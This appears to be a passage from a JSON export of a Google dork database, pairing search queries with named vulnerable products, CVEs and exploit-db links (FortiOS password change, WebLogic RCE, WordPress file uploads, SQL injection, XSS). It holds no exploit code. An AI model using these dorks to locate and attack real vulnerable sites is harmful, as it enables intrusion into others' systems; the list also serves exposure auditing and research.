Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Please Login\" \"Use FTM Push\"", "description": "# Google Dork: intitle:\"Please Login\" \"Use FTM Push\"\r\n# Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification. CVE-2018-13382. https://www.exploit-db.com/exploits/49074\r\n# Date: 22/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Powered by vBulletin(R) Version 5.6.3\"", "description": "# Google Dork: \"Powered by vBulletin\u00ae Version 5.6.3\"\r\n\r\n# vBulletin 5.6.3 - 'group' Cross Site Scripting.\r\nhttps://www.exploit-db.com/exploits/49209\r\n\r\n# Date: 7/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/themes/altair/", "description": "# Google Dork : inurl:/wp-content/themes/altair/\r\n# Shows Altair WordPress theme v4.8 - Unauthenticated Reflected XSS\r\n# Author : ANURAG K P"}, {"dork": "inurl:/pro_users/login", "description": "# Google Dork: inurl:/pro_users/login\r\n# Spiceworks 7.5 - HTTP Header Injection. CVE : CVE-2020-25901.\r\n# https://www.exploit-db.com/exploits/49299\r\n# Date: 21/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/cgi-bin/manlist?section", "description": "# Google Dork: inurl:/cgi-bin/manlist?section\r\n# SCO Openserver 5.0.7 - 'section' Reflected XSS. CVE : CVE-2020-25495.\r\n# https://www.exploit-db.com/exploits/49300\r\n# SCO Openserver 5.0.7 - 'outputform' Command Injection. CVE : CVE-2020-25494\r\n# https://www.exploit-db.com/exploits/49301\r\n# Date: 21/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Incom CMS 2.0\"", "description": "# Google Dork: intext:\"Incom CMS 2.0\"\r\n# IncomCMS 2.0 - Insecure File Upload. CVE: CVE-2020-29597. https://www.exploit-db.com/exploits/49351\r\n# Date: 5/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"machform\" inurl:\"view.php\"", "description": "# Google Dork: \"machform\" inurl:\"view.php\"\r\n# MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload\r\n# Bypass. CVE-2018-6409, CVE-2018-6410, CVE-2018-6411.\r\n# https://www.exploit-db.com/exploits/44804\r\n\r\n# Date: 21/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/console/login/LoginForm.jsp\"", "description": "# Google Dork: inurl:\"/console/login/LoginForm.jsp\"\r\n\r\n# Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated). CVE-2020 14882.\r\n# https://www.exploit-db.com/exploits/49479\r\n\r\n# Date: 28/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:uno.php", "description": "# Google Dork: inurl:uno.php\r\n\r\n# CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated). \r\n#CVE :CVE-2020-25557 & CVE-2020-25538. https://www.exploit-db.com/exploits/49485\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/wp-content/plugins/super-forms/\"", "description": "# Google Dork: inurl:\"/wp-content/plugins/super-forms/\"\r\n# WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code\r\n# Execution. https://www.exploit-db.com/exploits/49490\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Powered By Best Support System\"", "description": "# Google Dork: \"Powered By Best Support System\"\r\n\r\n# Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated).\r\n# CVE: CVE-2020-24963. https://www.exploit-db.com/exploits/49122\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/calendar/calendar_form.php", "description": "# Google Dork: inurl:/calendar/calendar_form.php\r\n\r\n# Triconsole 3.75 - Reflected XSS. CVE: 2021-27330.\r\n# https://www.exploit-db.com/exploits/49597\r\n\r\n# Date: 1/3/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ics?tool=search", "description": "# Dork: inurl:/ics?tool=search\r\n# Dork To Find the WebApps Vulnerable for CVE-2021-26723"}, {"dork": "inurl:\"telerik.web.ui.webresource.axd?type=rau\"", "description": "Dork: inurl:\"telerik.web.ui.webresource.axd?type=rau\"\r\n\r\nReferences;\r\nhttps://github.com/noperator/CVE-2019-18935\r\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\r\n\r\nAuthor: Eray \u00c7ak\u0131n"}, {"dork": "inurl:\"/lib/editor/atto/plugins/managefiles/\" | inurl:\"calendar/view.php?view=month\"", "description": "# Google Dork: inurl:\"/lib/editor/atto/plugins/managefiles/\" | inurl:\"calendar/view.php?view=month\"\r\n\r\n# Moodle 3.10.3 - 'label' Persistent Cross Site Scripting.\r\n# https://www.exploit-db.com/exploits/49714\r\n\r\n# Date: 26/3/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"citsmart.local\"", "description": "# Google Dork: \"citsmart.local\"\r\n# CITSmart ITSM 9.1.2.22 - LDAP Injection. CVE : CVE-2020-35775. https://www.exploit-db.com/exploits/49762\r\n# CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated).\r\n# CVE : CVE-2021-28142. https://www.exploit-db.com/exploits/49763\r\n# Date: 16/4/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"wp-content/plugins/wp-super-edit/superedit/\" | inurl:\"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/\"", "description": "# Google Dork: inurl:\"wp-content/plugins/wp-super-edit/superedit/\" | inurl:\"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/\"\r\n# Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload.\r\n# https://www.exploit-db.com/exploits/49839\r\n# Date: 25/05/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/1-flash-gallery", "description": "# Dork: inurl:wp-content/plugins/1-flash-gallery\r\n# Description:This google dork lists out Advisories and Vulnerabilities\r\n# regarding the 1-flash-gallery wordpress plugin.\r\n\r\n# Ref: https://wpscan.com/vulnerability/36e3817f-7fcc-4a97-9ea2-e5e3b01f93a1\r\n\r\n# Author: Rutvik Jaini"}, {"dork": "inurl:\"/wp-content/plugins/123ContactForm", "description": "# Dork: inurl:\"/wp-content/plugins/123ContactForm\"\r\n\r\n#Author: Rutvik Jaini\r\n\r\n#references: https://wpscan.com/vulnerability/ce716e4f-60f8-42e3-8891-a38e7948b970\r\n\r\nhttps://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html\r\n\r\nDescriptionThe cfp-connect AJAX call uses user input controlled data to\r\nperform the signature verification, attackers could craft these values\r\n($message, $signature, $cf_pub_key) to bypass the validation mechanisms and\r\ninject their own public_key into the database.\r\n\r\nPOC:"}, {"dork": "inurl:wp-content/plugins/Ultimate-member", "description": "# Dork: inurl:wp-content/plugins/Ultimate-member\r\n# Description:This google dork lists out website using this vulnerable wordpress plugin even provide path to it unistall or install php link\r\n\r\n# exploit Ref:https://www.exploit-db.com/exploits/48065\r\nThanks and regards\r\n Mayank Bharti (cleverfox)"}, {"dork": "inurl:/wp-content/plugins/wpdiscuz/", "description": "# Google Dork: inurl:/wp-content/plugins/wpdiscuz/\r\n\r\n# Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload\r\n# (Unauthenticated). CVE : CVE-2020-24186.\r\n# https://www.exploit-db.com/exploits/49962\r\n\r\n# Date: 7/6/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:quicklinks.aspx", "description": "# Google Dorks : inurl:quicklinks.aspx\r\n# Advisories and Vulnerabilities\r\n# Date: 07/23/2021\r\n#Author: Abishekraghav Murugeashan"}, {"dork": "\"PHP Projectworlds 1.0\"", "description": "# Google Dork: \"PHP Projectworlds 1.0\"\r\n# Advisories and Vulnerabilities\r\n# Date: 18/08/2021 \r\n# Exploit Author: Tanmay Bhattacharjee"}, {"dork": "inurl:\"index.php?page=news.php\"", "description": "# Google Dork: inurl:\"index.php?page=news.php\"\r\n# Advisories and Vulnerabilities\r\n# Date: 18/08/2022\r\n# Author: Omar Shash"}, {"dork": "# Google Dork: intext:\"Powered by Virtual Airlines Manager [v2.6.2]\"", "description": "# Google Dork: intext:\"Powered by Virtual Airlines Manager [v2.6.2]\"\r\n# Advisories and Vulnerabilities\r\n# Date:21/02/2023\r\n# Exploit Author: Milad karimi"}]} \ No newline at end of file